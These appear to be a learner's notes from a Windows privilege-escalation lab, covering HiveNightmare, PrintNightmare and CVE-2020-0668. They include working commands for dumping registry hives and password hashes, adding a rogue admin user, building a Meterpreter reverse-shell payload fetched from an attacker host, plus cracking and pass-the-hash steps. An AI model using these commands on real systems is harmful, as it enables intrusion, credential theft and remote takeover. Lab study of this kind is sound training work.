# Intro - In large enterprises, ensuring that  that all user desktops and servers are updated and patched is great challenge -  SCCM (Microsoft System Center Configuration Manager) or WSUS (Windows Server Update Services) can help here - Regardless, there have been many kernel exploits that affect the Windows operating system from Windows 2000/XP up to Windows 10/Server 2016/2019 - This [site](https://msrc.microsoft.com/update-guide/vulnerability) is handy for searching out detailed info about Microsoft vulns # Notable Vulns - `MS08-067` - This was an RCE vuln in the "Server" service due to improper handling of RPC requests - This affected Windows Server 2000, 2003, and 2008 and Windows XP and Vista and allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges - `MS17-010` - Also known as [EternalBlue](https://en.wikipedia.org/wiki/EternalBlue) is an RCE vuln that was part of the FuzzBunch toolkit released in the [Shadow Brokers](https://en.wikipedia.org/wiki/The_Shadow_Brokers) leak - This exploit leverages a vuln in the SMB protocol because the SMBv1 protocol mishandles packets specially crafted by an attacker, leading to arbitrary code execution on the target host as the SYSTEM account - `ALPC Task Scheduler 0-Day` - The ALPC endpoint method used by the Windows Task Scheduler service could be used to write arbitrary DACLs to `.job` files located in the `C:\Windows\tasks` directory - An attacker could leverage this to create a hard link to a file that the attacker controls - The exploit for this flaw used the [SchRpcSetSecurity](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/a8172c11-a24a-4ad9-abd0-82bcf29d794d?redirectedfrom=MSDN) API function to call a print job using the XPS printer and hijack the DLL as NT AUTHORITY\SYSTEM via the Spooler service - `CVE-2021-36934 HiveNightmare - Windows 10 flaw that results in ANY user having rights to read the Windows registry and access sensitive info - Researchers quickly developed a PoC exploit to allow reading of the SAM, SYSTEM, and SECURITY registry hives and create copies of them to process offline later and extract password hashes (including local admin) using a tool such as SecretsDump.py - `CVE-2021-1675/CVE-2021-34527 PrintNightmare` - This is a flaw in [RpcAddPrinterDriver](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/f23a7519-1c77-4069-9ace-a6d8eae47c22) which is used to allow for remote printing and driver installation - This function is intended to give users with the Windows privilege `SeLoadDriverPrivilege` the ability to add drivers to a remote Print Spooler - The flaw allowed any authenticated user to add a print driver to a Windows system without having the privilege mentioned above, allowing an attacker full RCE as SYSTEM - The flaw affects every supported version of Windows, and being that the Print Spooler runs by default on Domain Controllers, Windows 7 and 10, and is often enabled on Windows servers, this presents a massive attack surface --- # Example Kernel Exploit - HiveNightmare - Successful exploitation requires readable SAM file and the presence of one or more shadow copies - Most Windows 10 systems will have `System Protection` enabled by default which will create periodic backups, including the shadow copy necessary to leverage this flaw - First, check perms on the SAM file using `icacls`  ```cmd icacls c:\Windows\System32\config\SAM ``` - This [PoC](https://github.com/GossiTheDog/HiveNightmare) can be used to perform the attack on the Windows target, creating copies of the aforementioned registry hives ```powershell .\HiveNightmare.exe ``` - Then, move the exported SAM, SYSTEM, and SECURITY hives to Kali, where we will extract password hashes ```bash impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local ``` --- # Example Kernel Exploit - PrintNightmare - First, check to see if the Spooler service is running - If not, we will receive a "path does not exist" error ```powershell \\localhost\pipe\spoolss ``` - Next, [bypass](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/) the execution policy on the target host ```powershell Set-ExecutionPolicy Bypass -Scope Process ``` - Now, import  [this](https://github.com/calebstewart/CVE-2021-1675)Powershell script and use it to add a new local admin user - This script can be used for quick local privesc - By default, this script adds a new local admin user - Alternatively, we can also supply a custom DLL to obtain a revshell ```powershell-session Import-Module .\CVE-2021-1675.ps1 Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt" ``` - Then, confirm new admin user ```powershell net user hacker ``` --- # Enumerate Missing Patches - Examine the installed updates on the target with one of the below three (3) commands ```powershell systeminfo wmic qfe list brief Get-Hotfix ``` - Search for each KB (Microsoft Knowledge Base ID number) in the [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000808) to get a better idea of what fixes have been installed and how far behind the system may be on security updates ## CVE-2020-0668 Example - In this example, we will exploit [Microsoft CVE-2020-0668: Windows Kernel Elevation of Privilege Vulnerability](https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/), which exploits an arbitrary file move vulnerability leveraging the Windows Service Tracing - Service Tracing allows users to troubleshoot issues with running services and modules by generating debug information - Its parameters are configurable using the Windows registry. Setting a custom MaxFileSize value that is smaller than the size of the file prompts the file to be renamed with a `.OLD` extension when the service is triggered - This move operation is performed by `NT AUTHORITY\SYSTEM`, and can be abused to move a file of our choosing with the help of mount points and symbolic links - Verify current user's privs ```cmd whoami /priv ``` - Next, download and build  [this](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668) exploit for CVE-2020-0668 - After building the exploit we should see the following files ```txt CVE-2020-0668.exe CVE-2020-0668.exe.config CVE-2020-0668.pdb NtApiDotNet.dll NtApiDotNet.xml ``` - At this point, we can use the exploit to create a file of our choosing in a protected folder such as `C:\Windows\System32` - We aren't able to overwrite any protected Windows files - This privileged file write needs to be chained with another vulnerability, such as [UsoDllLoader](https://github.com/itm4n/UsoDllLoader) or [DiagHub](https://github.com/xct/diaghub) to load the DLL and escalate our privileges - We can also look for any third-party software, which can be leveraged, such as the Mozilla Maintenance Service - This service runs in the context of SYSTEM and is startable by unprivileged users - Runpath = `C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe` - Check perms on `maintenanceservice.exe` with `icacls` - If `BUILTIN\USERS` have (I)RX privs, standard users only have read and execute perms on this binary ```cmd icacls "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" ``` - Generate a  a malicious `maintenanceservice.exe` binary that can be used to obtain a Meterpreter revshell ```shell-session sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe -o maintenanceservice.exe ``` - Host the malicious binary from Kali and download two copies onto the target - NOTE: We need tow copies because running the exploit corrupts the malicious version of `maintenanceservice.exe` that is moved to`c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe` ```powershell wget http://10.10.15.244:8080/maintenanceservice.exe -O maintenanceservice.exe wget http://10.10.15.244:8080/maintenanceservice.exe -O maintenanceservice2.exe ``` - Run the exploit ```cmd C:\Tools\CVE-2020-0668\CVE-2020-0668.exe C:\Users\htb-student\Desktop\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" ``` - Now, check the perms on the new file ```cmd icacls 'C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe' ``` - Overwrite the `maintenanceservice.exe` binary in `c:\Program Files (x86)\Mozilla Maintenance Service` with a good working copy of our malicious binary created earlier before proceeding to start the service ```cmd copy /Y C:\Users\htb-student\Desktop\maintenanceservice2.exe "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" ``` - Next we will setup the listener on `msf` - Here, we will create a resource script that will be used to preload out settings ```bash cat handler.rc use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST <our_ip> set LPORT 8443 exploit sudo msfconsole -r handler.rc ``` - Now we can start the service ```cmd net start MozillaMaintenance ``` - We will get an error above when starting the service but will still receive a callback once the Meterpreter binary execute ```bash [*] Started HTTPS reverse handler on https://10.10.14.3:8443 [*] https://10.10.14.3:8443 handling request from 10.129.43.13; (UUID: syyuxztc) Staging x64 payload (201308 bytes) ... [*] Meterpreter session 1 opened (10.10.14.3:8443 -> 10.129.43.13:52047) at 2021-05-14 13:38:55 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WINLPE-WS02 OS : Windows 10 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 6 Meterpreter : x64/windows meterpreter > hashdump Administrator:500:aad ``` --- # Exercise ## Initial Enum - `ping` test![[images/Pasted image 20260221171627.png]] - `nmap` scan ![[images/Pasted image 20260221171636.png]] - `rdp` into target with given creds - light internal enum on target - no interesting privs or groups![[images/Pasted image 20260221172034.png]] - check `\tools` ![[images/Pasted image 20260221172050.png]] - check `systeminfo` ![[images/Pasted image 20260221172117.png]] --- ## HiveNightmare - Check perms on `SAM` - `BUILTIN\USERS` have `(I)RX` perms ![[images/Pasted image 20260221172208.png]] - Let's download `https://github.com/GossiTheDog/HiveNightmare/raw/master/Release/HiveNightmare.exe` on Kali and move to target ![[images/Pasted image 20260221172715.png]] ![[images/Pasted image 20260221172728.png]] - Run the exploit ![[images/Pasted image 20260221172836.png]] - Move SAM, SYSTEM, SECURITY to Kali - Startup FTP server on Kali ![[images/Pasted image 20260221173632.png]] - Upload to FTP server from target ![[images/Pasted image 20260221173856.png]] - SAM is now on Kali ![[images/Pasted image 20260221173927.png]]![[images/Pasted image 20260221173918.png]] - Repeat for SYSTEM and SECURITY ![[images/Pasted image 20260221174205.png]]![[images/Pasted image 20260221174215.png]] - Now that we have SAM, SYSTEM, and SECURITY on Kali, let's extract password hashes with `secretsdump.py` ![[images/Pasted image 20260221174324.png]] - Crack `nthash` portion of Administrator password with `hashcat` as below - Exhausted list ```bash hashcat -m 1000 "hash" /opt/rockyou.txt ``` - Let's try to PtH with `nxc` ``` nxc smb ip -u user -H hash ``` - PWNED ![[images/Pasted image 20260221175021.png]] - Now we can find and `type` flag from here ```bash nxc smb ip -u user -H hash -X "dir \users\administrator\desktop" nxc smb ip -u user -H hash -X "type \users\administrator\desktop\flag.txt" ``` --- ## PrintNightmare - Check for Spooler Service ![[images/Pasted image 20260221175358.png]] - Bypass execution policy ![[images/Pasted image 20260221175426.png]] - Confirm that `\tools` has `CVE-2021-1675.ps1` ![[images/Pasted image 20260221175507.png]] - Import and run `CVE-2021-1675.ps1` ![[images/Pasted image 20260221175709.png]] - Confirm new user `jake` > booyah! ![[images/Pasted image 20260221175741.png]] - Sign-out of current session and reconnect with `rdp` as new user ![[images/Pasted image 20260221175910.png]] - Now check privs and head to the flag ![[images/Pasted image 20260221180120.png]] ![[images/Pasted image 20260221180157.png]] --- ## CVE-2020-0668 - Enumerate updates with `wmic` - No updates since 2020 ![[images/Pasted image 20260221180358.png]] - Review privs and available tools ![[images/Pasted image 20260221180518.png]] - Check perms on `maintenanceservice.exe` - `BUILTIN\Users:(I)(RX)` ![[images/Pasted image 20260221180629.png]] - Generate meterpreter payload on Kali ![[images/Pasted image 20260221180722.png]] - Host the payload and `wget` on target ![[images/Pasted image 20260221180902.png]] ![[images/Pasted image 20260221180924.png]] - Run the exploit `C:\Tools\CVE-2020-0668\CVE-2020-0668.exe` ![[images/Pasted image 20260221181033.png]] - Check perms on new file - `htb-student` has full control over the binary now ![[images/Pasted image 20260221181117.png]] - Replace file with second copy of payload - downgrade to `cmd.exe` ![[images/Pasted image 20260221181336.png]] - Create `msf` resource file ![[images/Pasted image 20260221181424.png]] - Launch `msf` with the above resource file ![[images/Pasted image 20260221181904.png]] - Start the `MozillaMaintenance` service and hope for a revshell ![[images/Pasted image 20260221182009.png]] - We have a revshell! ![[images/Pasted image 20260221182002.png]] - We have options now: Drop into a shell and navigate to flag; PtH with `nxc`, or crack hash with `hashcat` and login as `administrator`